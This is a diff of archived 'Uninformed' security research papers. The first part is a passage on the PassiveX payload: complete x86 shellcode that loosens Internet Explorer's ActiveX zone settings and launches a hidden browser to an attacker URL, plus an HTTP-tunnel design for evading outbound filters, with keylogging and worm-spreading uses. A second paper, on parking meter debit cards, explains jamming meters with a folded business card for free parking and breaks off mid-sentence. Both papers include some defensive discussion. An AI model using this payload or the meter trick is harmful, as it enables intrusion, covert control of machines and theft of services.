system directory path +to the first byte of the path to Internet Explorer on disk, thus +ensuring that the drive letters are the same This code has +potential issues with certain locales depending on whether or not +assumptions made about code paths or ASCII drive letters are safe.. + +6. Execute a hidden Internet Explorer with a specific target URL + +Once the full path to Internet Explorer has been located, all that +remains is to execute a hidden Internet Explorer with it pointed at +an attacker controlled HTTP server. This is accomplished by calling +CreateProcessA with the command line argument properly set +to the full path to Internet Explorer. Furthermore, the +wShowWindow attribute should be set to SW_HIDE to +ensure that the Internet Explorer instance is hidden from view. This +is accomplished by calling CreateProcessA in the following +fashion: + +PROCESS_INFORMATION pi; +STARTUPINFO si; + +ZeroMemory( + &si, + sizeof(si)); + +si.cb = sizeof(si); +si.dwFlags = STARTF_USESHOWWINDOW; +si.wShowWindow = SW_HIDE; + +CreateProcessA( + NULL, + url, // "\path\to\iexplore.exe -new " + NULL, + NULL, + FALSE, + CREATE_NEW_CONSOLE, + NULL, + NULL, + &si, + &pi); + +One important thing to note about this phase is that in order to get +it to work properly with system services that are not able to +directly interact with the desktop, the si.lpDesktop attribute +must be set to something like WinSta0\Default. + +An implementation of this approach can be found below. It is +optimized for size (roughly 400 bytes, adjusted for the variable URL +length), robustness, and portability. A large part of the payload's +size comes from the static strings that it has to reference for +opening the registry key, setting the values, and executing Internet +Explorer. The size of the payload is one of its major benefits to +this approach as it ends up being much smaller than other techniques +that attempt to accomplish a similar goal. + +Targets: NT/2000/XP/2003 +Size: ~400 bytes + URL size + +passivex: + cld + call get_find_function +strings: + db "Software\Microsoft\Windows\" + db "CurrentVersion\Internet Settings\Zones\3", 0x0 +reg_values: + db "1004120012011001" +url: + db "C:\progra~1\intern~1\iexplore -new" + db " http://attacker/controlled/site", 0x0 +get_find_function: + call startup +find_function: + pushad + mov ebp, [esp + 0x24] + mov eax, [ebp + 0x3c] + mov edi, [ebp + eax + 0x78] + add edi, ebp + mov ecx, [edi + 0x18] + mov ebx, [edi + 0x20] + add ebx, ebp +find_function_loop: + jecxz find_function_finished + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + compute_hash: + xor eax, eax + cdq +compute_hash_again: + lodsb + test al, al + jz compute_hash_finished + ror edx, 0xd + add edx, eax + jmp compute_hash_again +compute_hash_finished: +find_function_compare: + cmp edx, [esp + 0x28] + jnz find_function_loop + mov ebx, [edi + 0x24] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edi + 0x1c] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + mov [esp + 0x1c], eax +find_function_finished: + popad + retn 8 +startup: + pop edi + pop ebx +find_kernel32: + xor edx, edx + mov eax, [fs:edx+0x30] + test eax, eax + js find_kernel32_9x +find_kernel32_nt: + mov eax, [eax + 0x0c] + mov esi, [eax + 0x1c] + lodsd + mov eax, [eax + 0x8] + jmp short find_kernel32_finished +find_kernel32_9x: + mov eax, [eax + 0x34] + add eax, byte 0x7c + mov eax, [eax + 0x3c] +find_kernel32_finished: + mov ebp, esp +find_kernel32_symbols: + push 0x73e2d87e + push eax + push 0x16b3fe72 + push eax + push 0xec0e4e8e + push eax + call edi + xchg eax, esi + call edi + mov [ebp], eax + call edi + mov [ebp + 0x4], eax +load_advapi32: + push edx + push 0x32336970 + push 0x61766461 + push esp + call esi +resolve_advapi32_symbols: + push 0x02922ba9 + push eax + push 0x2d1c9add + push eax + call edi + mov [ebp + 0x8], eax + call edi + xchg eax, edi + xchg esi, ebx +open_key: + push esp + push esi + push 0x80000001 + call edi + pop ebx + add esi, byte (reg_values - strings) + push eax + mov edi, esp +set_values: + cmp byte [esi], 'C' + jz initialize_structs + push eax + lodsd + push eax + mov eax, esp + push byte 0x4 + push edi + push byte 0x4 + push byte 0x0 + push eax + push ebx + call [ebp + 0x8] + jmp set_values +fixup_drive_letter: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl +initialize_structs: + push byte 0x54 + pop ecx + sub esp, ecx + mov edi, esp + push edi + rep stosb + pop edi + mov byte [edi], 0x44 + inc byte [edi + 0x2c] + inc byte [edi + 0x2d] +execute_process: + lea ebx, [edi + 0x44] + push ebx + push edi + push eax + push eax + push byte 0x10 + push eax + push eax + push eax + push esi + push eax + call [ebp] +exit_process: + call [ebp + 0x4] + +3.2) HTTP Tunneling ActiveX Control + +The second stage is arbitrary in that an attacker could implement an +ActiveX control to do virtually anything. For instance, an ActiveX +control could cause a chicken wearing pants to slide around the +screen every few minutes. Though this would be patently useless, +it's nonetheless an example of the types of things that can be +accomplished by an ActiveX control. For the purposes of this +document, however, the ActiveX control will construct a +communication channel, over HTTP, between a target machine and the +attacker's machine such that arbitrary data can pass between the two +entities in a way that is compatible with restrictive outbound +filters. Like the payload described in , there are a +number of ways to implement an ActiveX control capable of +accomplishing this task. Going forward, this section requires basic +knowledge of COM (Component Object Model). + +The approach taken in this document was to create an ActiveX control +using ATL, short for Active Template Library) The +reason that ATL was picked over MFC was due to the fact that MFC is +less portable without CAB'ing dependencies (as when dynamically +linked against the MFC DLLs), or much larger (as when statically +linked against the MFC libs).. The purpose of the ActiveX control, +as described in this chapter, is to build an HTTP tunnel between the +attacker and the target machine. The ActiveX control should also be +able to, either directly or indirectly, make use of the HTTP tunnel, +such as by piping the input and output of a command interpreter +through the HTTP tunnel. + +The ActiveX control discussed in this document makes use of the HTTP +tunnel by creating what has been dubbed a local TCP +abstraction. This is basically a fancy term for using a truly +streaming connection, such as a TCP connection, as an abstraction to +the bidirectional HTTP tunnel. The reason this is advantageous is +because it allows code to run without knowing that it is actually +passing through an HTTP tunnel, hence the abstraction. This is +especially important when it comes to re-using code that is natively +capable of communicating over a streaming connection. + +One way in which this abstraction layer can be created is by having +the ActiveX control create a TCP listener on a random local port. +After that, the ActiveX control can establish a connection to the +listener. This creates the client half of the streaming connection +which will be used to transmit data to and from the remote machine +in a truly streaming fashion. After the ActiveX control establishes +a connection to the local TCP listener, it must also accept the +connection on behalf of the listener. The server half of the +connection is what is used both to encapsulate data coming from the +target machine to the attacker's machine and as the truly streaming +destination for data being sent from the attacker to the target +machine. Data that is written to the server half of the connection +will, in turn, be read from the client half of the connection by +whatever it is that's making use of the socket, such as a command +interpreter. This method of TCP abstraction even works under the +radar of application-based filters like Zone Alarm because the +listener is bound to a local interface instead of an actual +interface This was tested with Zone Alarm 5.5.062.011.. + +The ActiveX control itself is composed of a number of different +files whose purposes are described below: + + +File | Description +--------------------------------------------- +CPassiveX.cpp | Coclass implementation source +CPassiveX.h | Coclass implementation header +HttpTunnel.h | HTTP tunnel management class header +HttpTunnel.cpp | HTTP tunnel management class source +PassiveX.bin | Interface registration data +PassiveX.idl | IPassiveX interface, coclass, and typelib definition +PassiveX.rc | Resource script containing version information, etc +resource.h | Resource identifier definitions +PassiveX.cpp | DLL exports and entry point implementations + +The first place to start when implementing an ActiveX control is +with the control's interface definition which is defined in +PassiveX.idl. In this case, the control has its own +interface defined so that it can export a few getters and setters +that will allow the browser to set properties on an instance of the +ActiveX control. The ActiveX control requires two primary +parameters, namely the attacker's remote host and port, in order to +construct the HTTP tunnel. Furthermore, it may also be necessary to +instruct the ActiveX control that it should download more custom +code to execute once the control has been initialized, such as a +second stage payload that would make use of the established HTTP +tunnel. Parameters are typically passed using the HTML +PARAM tag in the context of an OBJECT tag. + +The three parameters that the ActiveX control in this document +supports are: + + +Property | Description +---------------------------------- +HttpHost | The DNS or IP address of the attacker controlled machine +HttpPort | The port, most likely 80, that the attacker is listening on +DownloadSecondStage | A boolean value which indicates whether or not a second stage should be downloaded + +The getters and setters for these three properties are provided +through the control's IPassiveX interface which is defined +in the PassiveX.idl file. The coclass, defined as +CPassiveX in CPassiveX.h, uses the +IPassiveX interface as its default interface. Aside from +the default interface, the ActiveX control must also inherit from +and implement a number of other interfaces in order to make it +possible for the ActiveX control to be loaded in Internet +Explorer Reference code can be found in the Metaploit +Framework. + +Once the ActiveX control's interface and coclass have been +sufficiently implemented to allow an instance to load in the context +of Internet Explorer, the next step becomes the constructing of the +HTTP tunnel. One of the easiest ways to implement this portion of +the ActiveX control is to make use of Microsoft's Windows +Internet API, or WinINet for short. The purpose of WinINet is to +provide applications with an abstract interface to protocols such as +Gopher, FTP, and HTTP. One of the major benefits to +using this API is that it will make use of the same settings that +Internet Explorer uses as far as proxying and zone restrictions are +concerned. This means that if a user normally has to send their +HTTP traffic through a proxy and has configured Internet Explorer to +do so, any application that uses WinINet will be able to share the +same settings The API also allows the programmer to +explicitly ignore the pre-cached settings if so desired.. The +actual API routines that are necessary to build an HTTP tunnel using +WinINet are described below: + + +WinINet Function | Purpose +----------------------------- +InternetOpen | Initializes the use of the other WinINet functions +InternetConnect | Opens a connection to a host for a given service +InternetSetOption | Allows for setting options on the connection, such as request timeout +HttpOpenRequest | Opens a request handle that is associated with a specific request +HttpSendRequest | Transmits an HTTP request to the target host +InternetReadFile | Reads response data after a request has been sent +HttpQueryInfo | Allows for querying information about an HTTP response, such as status code +InternetCloseHandle | Closes a WinINet handles + +The above described functions can be used to create a logical HTTP +tunnel that conforms to the HTTP protocol, appears like a normal +web-browser, and uses any pre-configured internet settings. The +basic steps necessary to make this happen are described below: + + +1. Initialize WinINet with InternetOpen + +In order to make it possible to use the facilities provided by the +Windows Internet API, it is first necessary to call +wininet!InternetOpenA. The handle returned from a +successful call to wininet!InternetOpenA is required to be +passed as context to a number of other routines. + + +2. Create the send and receive threads + +Since there are two distinct channels by which data is transmitted +and received through the HTTP tunnel, it is necessary to create two +threads for handling both the send and the receive data. The reason +these two channels cannot be processed in the same thread +efficiently is because one half, the local TCP abstraction half, +uses Windows Sockets, whereas the second half, where data is read in +from the contents of HTTP responses between the target machine and +the attacker machine, uses the Windows Internet API. The handles +used by the two APIs cannot be waited on by a common routine. This +fact makes it more efficient to give each portion of the +communication its own thread so that they can use the native API +routines to poll for new data. + + +3. Poll the server side of the TCP abstraction in the send thread + +In order to check for data being sent from the target machine to the +attacker's machine, it is necessary to poll the server side of the +TCP abstraction. This can be accomplished by calling +ws2_32!select on an fdset that contains the +server half of the connection that was established to the local TCP +listener. When ws2_32!select returns one it indicates that +there is data of some form available for processing, whether it be +actual data to be read from the socket or an indication that the +socket has closed. When this occurs a call to ws2_32!recv +can be made to read data from the socket. If zero is returned it +indicates that the local connection has been terminated. Otherwise, +if a value larger than zero is returned, it indicates the number of +bytes actually read from the connection. The buffer that the data +was read into can then be used as the body content of an HTTP +POST request that is transmitted to the attacker. This +cycle repeats itself until the local connection eventually closes, +an error is encountered, or the stateless tunnel between the two +endpoints is terminated. + + +4. Poll for data from the remote side of the of the HTTP tunnel +in the receive thread + +Polling for data that is being sent from the attacker to the target +machine is not as simple the other direction simply due to the fact +that the polling operation must be simulated using an HTTP +GET or POST request instead of using a native +routine to check for new data. This approach is necessary in order +to remain compliant with HTTP's request/response format. The actual +implementation is as simple as an infinite loop that continually +transmits an HTTP request to the attacker requesting data that +should be written to the server side of the TCP abstraction. If +data is present, the attacker will send an HTTP response that +contains the data to be written in the body of the response. If no +data is present, the attacker can either wait for data to become +available or respond with no content in the response. In either +case, the polling thread should repeat itself at certain intervals +(or immediately if data was just indicated) for the duration of time +that the stateless HTTP tunnel between the two endpoints stays up. + +Beyond these simple tasks, the ActiveX control can also download and +execute a second stage payload in the context of its own thread. +This second stage payload could be passed the file descriptor of the +client half of the TCP abstraction which would allow it to +communicate with the attacker over a truly streaming socket that +just so happens to be getting encapsulated and decapsulated in HTTP +requests and responses. There are also a number of other things +that could be developed into the ActiveX control to make it a more +robust platform from which further attacks could be mounted. These +extensions will be discussed more in the next chapter. + + +4) Potential Uses and Enhancements + +The PassiveX payload has the ability to be used for a wide array of +things regardless of whether or not an HTTP tunnel is even used. The +ability for a payload to inject an untrusted ActiveX control into an +Internet Explorer instance without any user interaction at all is +enough to give an attacker full control over the machine without the +attacker so much as typing a single command. The ways in which such +a thing could be accomplished could be through the development of a +robust and feature-filled ActiveX control that may or may not make +use of an HTTP tunnel between the target host and the attacker. This +abstract concept will be discussed alongside other more concrete +uses for this technique in the sections of this chapter. + + +4.1) Automation with Scripting + +An abstract application of this payload would be to create an +ActiveX control that provides a scriptable interface to the machine +that it is loaded on. This would let an attacker interface with the +generic ActiveX control via JavaScript or vbscript in a manner that +would allow for easy automation and control of the machine that it's +loaded on. For instance, the ActiveX control could provide, via its +COM interface or interfaces, a scripting-accessible API to things +like the filesystem, networking, the registry, and other core +components of the operating system. The primary benefit to +implementing an ActiveX control that provides access to components +such is these is that automated code can be written in a browser +supported scripting language rather than having to modify the +ActiveX control itself each time a new feature is to be added. The +use of a scripting interface can be seen as a more flexible method +of interacting with a machine, though it does come at the cost of +requiring the ActiveX control to expose enough of the operating +system's feature set to make it useful. + + +4.2) Passive Information Gathering + +In some situations the ActiveX control may not have enough +information to create an HTTP tunnel between the target machine and +the attacker. An example of information that the control would need +but may not have is proxy authorization credentials. In cases such +as these it would be possible for the ActiveX control to be enhanced +to support keystroke logging and other forms of information +gathering that would allow it to collect enough data to be able to +build some sort of data channel. The ActiveX control could also be +extended to make the data channel more covert by having it vary both +in protocol, such as by switching to and from DNS, and in delay, +such as by causing HTTP posts to be spread out in time to make them +appear less suspicious. + + +4.3) Penetration Testing + +Perhaps one of the must useful cases for the PassiveX payload is in +the field of penetration testing where it's not always possible to +get into a network by the most direct means. It is common practice +for corporations to make use of some sort of outbound filter, +whether it be network-based, application-based, intermediate, or a +combination of all three. Under conditions like these, a +penetration tester may find themselves capable of exploiting a +vulnerability but without an ability to really take control of the +machine being exploited. In cases such as these it would be useful +to have a payload that is capable of constructing a tunnel over an +arbitrary protocol, such as HTTP, that is able to bypass outbound +filters. + +This approach is also useful to a penetration tester in that it may +also be possible for them to make meaningful use of client-side +vulnerabilities that would otherwise be incommunicable due to +restrictive outbound filters. A particularly interesting +illustration of such an approach would be to demonstrate how +dangerous client-side browser vulnerabilities can be by showing that +even though a company employs outbound filters on the content that +leaves the network, it is still possible for an attacker to build a +streaming connection to machines on the internal network once a +browser vulnerability has been taken advantage of. Though such a +scenario will most likely not be the norm during penetration +testing, it is nonetheless a useful tool to have in the event that +such a case presents itself. + + +4.4) Worm Propagation + +There are uses for the PassiveX payload on the malicious side of the +house as well. Due to the payload's ability to support automation +through scripting and its inherent ability to allow for the +construction of tunnels over arbitrary protocols, it seems obvious +that such a tool could be useful in the realm of worm propagation. +Take for instance a worm that spreads through server-side daemon +vulnerabilities and also by embedding client-side browser +vulnerabilities into the web sites of web servers that become +compromised. The payload for the client-side browser +vulnerabilities would be the PassiveX payload which would then +download an inject an ActiveX control from a de-centralized location +that would be responsible for the continued propagation of the worm +through the same vectors. The payload's transmission over trusted +protocols would make it just that much harder to stop assuming some +level of effort were put forth to make the communication +indistinguishable from normal browser traffic. + + +5) Methods of Prevention + +Now that a payload has been defined that is capable of bypassing +standard outbound filters, the next step is to determine potential +solutions in order to assist in the prevention of such techniques. +Though efforts can be made elsewhere to prevent exploitation in the +first place, it is still prudent to attempt to analyze approaches +that could be taken to prevent a payload like the one described in +this document from being used in a real world scenario. The primary +concern when implementing a prevention mechanism, however, is that +it must not also prevent normal user traffic from working as +expected and should also be robust enough to catch future mutations +of the same technique. A failure to succeed on either of these +points is an indication that the prevention method is not entirely +viable or sound. With that in mind, two potential methods of +prevention will be described in this chapter, though neither of them +should be seen as complete method of prevention. The key point +again is that as long as it's possible for a user to communicate +with the internet, so too will it be possible for an attacker to +simulate traffic that looks as if it's coming from a user. + + +5.1) Heuristic based filtering + +One method of prevention would be to implement an outbound filter +that made use of contextual heuristics to determine if the traffic +passing between two hosts might be potentially indicative of +encapsulated data. For instance, a transparent HTTP proxy could +monitor and track the variance of form and the spacing of requests +and responses between two hosts. In the case of the simple HTTP +tunnel described in this document, a transparent HTTP proxy could +note that there is very little variance between the headers of both +the requests and the responses and that the form of communication +between the two hosts is unchanging. Though this could be made to +work, there are a number of problems that make using this technique +of prevention not entirely viable. + +The first and foremost problem with this technique is that it does +not actually prevent communication between the two entities until it +is able to determine that the requests and responses are of a common +form and pattern. This alone makes this method of "prevention" +entirely unreasonable, but it is nonetheless worthy of consideration +from a completeness standpoint. Other problems with this approach +include the fact that it's very easy to fool by making the +communication unpredictable, sporadic, and very similar to normal +HTTP traffic. This fact makes using a heuristic based form of +validation less favorable as it will always need to error towards +non-positive in order to prevent a poor user experience for +legitimate traffic passing through the proxy. + + +5.2) Improving application-based filters + +Another approach that can be taken to prevent tunneling through +arbitrary protocols is to enhance application-based filters. For +instance, PassiveX relies on its ability to execute a hidden +instance of Internet Explorer. If the execution of a hidden +Internet Explorer weren't permitted or the hidden instance were +unable to access network resources, the payload would not be +functional There have been rumors of decisions to make it +impossible to execute a hidden Internet Explorer, though no concrete +information has been posted at the time of this writing.. It would +also be useful to support application-based filters on network +activity that occurs on the loopback interface, such as binding to a +TCP port on loopback. However, support for this requires a different +approach than what is typically employed by most firewall vendors +and would not necessarily be indicative of a malicious +program Most firewall products for NT-based versions of +Windows are implemented as NDIS intermediate drivers since such +drivers provide the lowest level of supported filtering.. + +Perhaps one of the most useful enhancements would be to add +state-based filtering. One example of a state-based filter would be +to prevent outbound communication of applications like Internet +Explorer while the user is idle. Though this doesn't prevent +communication while the user is active, it does add another layer of +protection. Another example of a state-based filter would be to +track unrequested internet traffic and to ask the user if it should +be permitted. An example of unrequested internet traffic comes in +the form of the initial HTTP request that is made by the hidden +internet explorer. In this case, the Internet Explorer process was +not spawned by a user and thus the internet traffic can rightly be +deemed unrequested. + + +6) Conclusion + +Securing a network involves protecting it from being compromised +both from the outside and from the inside. To protect both of these +conditions, network administrators may make use of outbound filters +to help control and limit the type of content that is allowed to +leave the network in conjunction with inbound filters that control +and limit the type of content that is allowed to enter the network. +While filtering data in both directions is important, it is not +always enough to stop machines inside the network from being +compromised. Outbound filters in particular, whether employed at +the network, application, or intermediate level are all easily +bypassed by virtue of the fact that they allow users of the machine +to communicate with hosts on the internet in some form or another. + +In order for an attacker to bypass outbound filters, the attacker +must find a way to look like acceptable user traffic. One way of +approaching this is to implement a payload that enables the +execution of both signed and unsigned ActiveX controls in Internet +Explorer's Internet zone. Once enabled, the payload could +then launch a hidden Internet Explorer using a URL that contains an +embedded ActiveX control. From there, the ActiveX control could +construct an HTTP tunnel between the target machine and the +attacker, thus creating a channel through which data can be passed +in a fashion that will bypass most network's outbound filters. The +reason this bypasses most outbound filters is because it uses a +trusted protocol, such as HTTP, and is executed in the context of a +typically trusted process, such as Internet Explorer, in an attempt +to make the traffic appear legitimate. + +The benefits of such a payload vary based on a person's alignment. +However, it goes without saying that it could be potentially useful +to both sides of the fence. Whether used for penetration testing or +for worm propagation, the ability to bypass outbound filters makes +for an interesting connection medium beyond those typically used by +post-exploitation payloads, such as those that establish reverse +connections or listen on a port. Preventing payloads such as these +from being possible might involve enhancing the ability of outbound +filters to differentiate user traffic from non-user traffic. + +There's no question that the field of exploitation and +post-exploitation research is filled with vast amounts of ingenuity. +The very act of making something do what no one else considered, or +in ways no one considered, is one of the many examples of +creativity. However, with ingenuity comes a certain sense of +responsibility. While the topics expanded upon in this document +could be used for malicious purposes, the author hopes that instead +the reader will use this knowledge to discover or expand on things +that have yet to be discussed, thus making it possible to continue +the cycle of education and enlightenment. + + +Bibliography + +3APA3A, offtopic. Bypassing Client Application Protection Techniques. +http://www.securiteam.com/securityreviews/6S0030ABPE.html; +accessed Mar 17, 2005. + + +Dubrawsky, Ido. Data Driven Attacks Using HTTP Tunneling. +http://www.securityfocus.com/infocus/1793; accessed +Mar 15, 2005. + + +GNU. GNU httptunnel. +http://www.nocrew.org/software/httptunnel.html; +accessed Mar 15, 2005. + + +iDEFENSE. AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability. +http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities; +accessed Mar 08, 2005. + + +Microsoft Corporation. Working with Internet Explorer 6 Security Settings. +http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx; +accessed Mar 15, 2005. + + +Microsoft Corporation. The Component Object Model: A Technical Overview. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncomg/html/msdn_comppr.asp; +accessed Mar 16, 2005. + + +Microsoft Corporation. About WinINet. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wininet/wininet/about_wininet.asp; +accessed Mar 16, 2005. + + +OSVDB. Microsoft IE Object Type Property Overflow. +http://www.osvdb.org/displayvuln.php?osvdb_id=2967; +accessed Mar 08, 2005. + + +rattle. Using Process Infection to Bypass Windows Software Firewalls. +http://www.phrack.org/show.php?p=62&a=13; accessed +Mar 17, 2005. diff --git a/uninformed/1.3.txt b/uninformed/1.3.txt new file mode 100644 index 0000000..720ee1f --- /dev/null +++ b/uninformed/1.3.txt @@ -0,0 +1,752 @@ + + ==Uninformed Research== + +|=-----------------------=[ Smart Parking Meters ]=---------------------=| +|=----------------------------------------------------------------------=| +|=------------------=[ h1kari ]=-----------------=| + +--=[ Contents ]=---------------------------------------------------------- + + 1 - Introduction + 2 - ISO7816 + 3 - Synchronous Cards + 3.1 - Memory Cards + 3.2 - Parking Meter Debit Cards + 3.3 - The Simple Hack + 4 - Memory Dump + 5 - Synchronous Smart Card Protocol Sniffing + 5.1 - Sniffer Design + 5.2 - Sniffer Code + 6 - Protocol Analysis + 6.1 - Decoding Data + 6.2 - Timing Graph + 6.3 - Conclusions + 7 - Conclusion + + +--[ 1 - Introduction ]---------------------------------------------------- + + If this whitepaper looks a little familiar to you, I'm going to admit +off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone +Cards: How to make your own!) and is using a similar format to Phrack +62-15 (Introduction for Playing Cards for Smart Profits). I highly +recommend you read both of them if you're trying to learn about smart +cards. + + I'm sure that many of you that live near a major city have seen +parking meters that require you to pay money in order to park in a spot. +Upon initial analysis of these devices you'll notice there is a slot for +money to go in. On some, there is also a slot for a Parking Meter Debit +Card that you can purchase from the city. This article will analyze these +Parking Meters and their Debit Cards, show how they tick, and show how you +can defeat their security. + + The end goal however is to provide enough information so you can +create your own tools to learn more about smart cards and how they work. +I have no intention of having people use this article to rip off the +government, this is for educational purposes only. My only hope is that by +getting this information out there, security systems will be designed more +thoroughly in the future. + + PARKING METER + + _,-----,_ + ,-' `-, + / ._________. \ + / , | 00:00 <+-,-+------ Time/Credits Display + Meter Status ----+>'-''---------''-'<+----- Meter Status + | ,-------, | + | |\ |<+-------+----- Coin Slot + Smart Card Slot -----\--+->\ | | / + \ '----\--' / + \ / + \ / + \ / + \-----------/ + | ,-------, | + Money --------+-+-->o | | + | | | | + | | | | + | '-------' | + \---------/ + | | + + + For those not familiar with these devices, you can go to various +locations around town and purchase these Parking Meter Debit Cards that +are preloaded with $10, $20, or $50. To explain how to use these, I will +quote off of the instructions provided on the back of the cards: + + .--------------------------------------------------------------------. + / \ + | PARKING METER DEBIT CARD | + | | + | 1. Insert debit card into meter in direction shown by arrow. | + | The dollar balance of the card will flash 4 times. | + | 2. The Meter will increment in 6 min. segments. | + | 3. When desired time is displayed, remove card. | + | | + | DID YOU BUY TOO MUCH TIME? | + | TO OBTAIN EXTRA TIME REFUND | + | | + | * Insert the same debit card that was used to purchase time | + | on the meter. Full 6 minute increments will be credited to | + | card. Increments of less than 6 minutes will be lost. | + | | + | Parking cards may be used for ************** meters | + | which have yellow posts. | + | | + \--------------------------------------------------------------------/ + + NOTE: The increments are now 4 min due to raising prices + + I'm not including a lot of information that's provided in those +Phrack's that were mentioned, so if things look a little incomplete, +please read through them before emailing me with questions. + +Here's a list of all of my resources: + + - The ISO7816 Standard + + - Phrack 48-10/11 & 62-15 + + - Towitoko ChipDrive 130 + + - Homebrew Synchronous Protocol Sniffer (Schematics Included) + + - A few Parking Meter Debit Cards + + - A few Parking Meters + + - Computer with a Parallel Port + + - A business card or two + + +--[ 2 - ISO7816 ]--------------------------------------------------------- + + The ISO 7816 standard is one of the few resources we have to work with +when reverse engineering a smart card. It provides us with basic knowledge +of pin layouts, what the different pins do, and how to interface with +them. Unfortunately, it mostly covers asynchronous cards and doesn't +really touch on how synchronous cards work. To get more detailed +information on this please read Phrack 48-10/11. + + +--[ 3 - Synchronous Cards ]----------------------------------------------- + + Synchronous protocols are usually used with memory cards mainly to +reduce cost (since the card doesn't require an internal clock) and because +usually memory cards don't require much logic and are used for simple +applications. Asynchronous cards on the other hand have an internal clock +and can communicate with the reader at a fixed rate across the I/O line +(usually 9600 baud), asynchronous cards are usually used with processor +cards where more interaction is required (see Phrack 62-15). + + +----[ 3.1 - Memory Cards ]------------------------------------------------ + + Memory cards use a very simple protocol for sending data. First off, +because synchronous cards don't know anything about timing, their clock is +provided by the reader. In this situation, the reader can set the I/O line +when the clock is low (0v) and the card can set the I/O line when the +clock is high (5v). To dump all of the memory from a card, the reader +first sets the Reset line high to reset the card and keeps the clock +ticking. The first time the Reset line is low and the Clock is raised the +card will set the I/O line to whatever the 0 bit is in memory, the second +time it's raised, the card will set the I/O line to whatever the 1 bit is +in memory, etc. This is repeated until all of the data is dumped from the +card. + + __________________ +_| |___________________________________________ Reset + : : + : _____ : _____ _____ _____ _____ +_:_______| |____:_| |_____| |_____| |_____| Clk + : : : : : : : : : : +_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____ +_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address) + : : : : : +_: :_______:___________:___________:___________ +_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data +Bit n Bit 0 Bit 1 Bit2 Bit3 + +(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10) + + +----[ 3.1 - Parking Meter Debit Cards ]----------------------------------- + + Parking Meter Debit Cards behave very similarly to standard memory +cards, however they also have to provide some basic security to make sure +people can't get free parking. This is done by using a method similar to +the European Telephone Cards (SLE4406) where there is a section of memory +on the card that acts as a one-way counter where bits are set to a certain +amount of credits, then a security fuse is blown, and now the set bits can +only be flipped from 1 -> 0. This is a standard security mechanism that +makes it so people cannot recharge their cards once the credits have been +used. The only catch is that the way that the parking meters work makes it +so you can refund unused credits to the card. + + +----[ 3.2 - Parking Meter Debit Cards ]----------------------------------- + + If my little introduction to Synchronous Smart Cards just went right +over your head, here's an example of how to attack Parking Meters without +having to deal with electronics or code. If you ever try putting an +invalid card into a parking meter, you'll notice that after about 90 +seconds of flashing error messages, it will switch over to Out-of-Order +status. Now, for convenience sake, most cities allow you to park for free +in Out-of-Order spots. (Anyone see a loophole here???) + + .----------------------------------------------------------------------. + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : <- insert folded side | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + | : | + '----------------------------------------------------------------------' + + One simple method you can use for making it less obvious that +something in the slot is making it be Out-of-Order is to fold a business +card in half (preferably not yours) and insert it into the smart card +slot. It should be the perfect length that it will go in and be very +difficult to notice and/or take out. When you're finished parking, you +should be able to pull the business card out using a credit card or small +flathead screwdriver. + + +--[ 4 - Memory Dump ]----------------------------------------------------- + + To explain how the cards handle credits and refunds, I'll first show +you how the memory on the card is laid out. This dump was done using my +Towitoko ChipDrive 130 using Towitoko's SmartCard Editor Software (very +useful). I highly suggest that you use a commercial smart card reader or +some sort of non-dumb reader for dealing with synchronous cards, dumb +mouse (and most home-brew) readers only work with asynchronous cards. + + 0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff + 0x10: ffff ffff ffff ff00 0000 0000 0000 0000 + 0x20: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x30: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x40: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff + 0x60: ffff ffff ffff ffff ffff ffff ffff ffff + 0x70: ffff ffff ffff ffff ffff ffff ffff ffff + 0x80: ffff ffff ffff ffff ffff ffff ffff ffff + 0x90: ffff ffff ffff ffff ffff ffff ffff ffff + 0xa0: fcff ffff ffff ffff ffff ffff ffff ffff + 0xb0: ffff ffff ffff ffff ffff ffff ffff ffff + 0xc0: ffff ffff + + Now.. if we convert over the 0x50 line to bits and analyze it, we'll +notice this (note that bit-endianness is reversed): + + 0x50: 0000 0000 0000 0000 0000 0000 0000 0000 + 0x54: 0001 1111 1111 1111 1111 1111 1111 1111 + 0x58: 1111 1111 1111 1111 1111 1111 1111 1111 + 0x5a: 1111 1111 0011 1111 1111 1111 1111 1111 + + For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation +specifies bit offset), you get $0.10 on your card. For every bit that is 0 +between 0x5b and 0xb0 you get $0.10 in refunds. The total of these two +counters equals the amount of credits on your card. Now, how they handle +people using the refunds is by having the buffer of bits inbetween 0x55:1 +and 0x5b that can be used if there are refund bits that can be spent. This +only allows the user to use ~ $5 worth of refund bits. On this particular +card, the user has $0.60 worth of credits and $0.20 worth of refunds +making a total of $0.80 on the card (I know, I'm poor :-/). + + +--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------ + + Now that we've figured out how they store credits on the card, we need +to figure out how the reader writes to the card. To do this, we'll need +to somehow sniff the connection and reverse engineer their protocol. The +following section will show you how to make your own synchronous smart +card protocol sniffer and give you code for sniffing the connection. + + +----[ 5.1 - Sniffer Design ]---------------------------------------------- + + There's plenty of commercial hardware out there (Season) that allow +you to sniff asynchronous smart cards, but it's a totally different story +for synchronous cards. I wasn't able to find any hardware to do this (and +being totally dumb when it comes to electronics) found someone to help me +out with this design (thx XElf). It basically taps the lines between a +smart card and the reader and runs the signals through an externally +powered buffer to make sure our parallel port doesn't drain the +connection. + + My personal implementation consists of a smart card socket I ripped +out of an old smart card reader, a peet's coffee card that I made ISO7816 +pinouts on using copper tape, all connected by torn apart floppy drive +cables, and powered by a ripped apart usb cable. You should be able to +find some pics on the net if you search around, although I guarantee +whatever you come up with will be 